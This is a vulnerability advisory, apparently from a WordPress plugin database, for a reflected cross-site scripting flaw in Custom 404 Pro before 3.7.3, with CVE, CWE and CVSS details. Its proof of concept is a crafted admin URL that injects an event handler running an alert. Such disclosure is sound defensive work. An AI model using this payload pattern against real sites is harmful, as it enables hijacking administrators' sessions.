WordPress Plugin Vulnerabilities

Custom 404 Pro < 3.7.3 - Reflected Cross-Site Scripting

Description

The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.

Proof of Concept

Make a logged in admin open https://example.com/wp-admin/admin.php?page=c4p-main&s=test" style=animation-name:rotation onanimationstart=alert(/XSS/)//

Affects Plugins

Plugin icon
custom-404-pro
Fixed in 3.7.3

References

CVE
CVE-2023-2023

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes
WPVDB ID
8859843a-a8c2-4f7a-8372-67049d6ea317

Timeline

Publicly Published
2023-05-02 (about 7 months ago)
Added
2023-05-02 (about 7 months ago)
Last Updated
2023-05-02 (about 7 months ago)

Other

Published
Title
Published
2023-11-07
Title
Countdown and CountUp, WooCommerce Sales Timer <= 1.8.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Published
2023-07-17
Title
YARPP < 5.30.4 - Contributor+ Stored Cross-Site Scripting
Published
2022-07-26
Title
Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting
Published
2021-11-22
Title
Icegram < 2.0.5 - Reflected Cross-Site Scripting
Published
2021-12-27
Title
WP User Frontend < 3.5.26 - SQL Injection to Reflected Cross-Site Scripting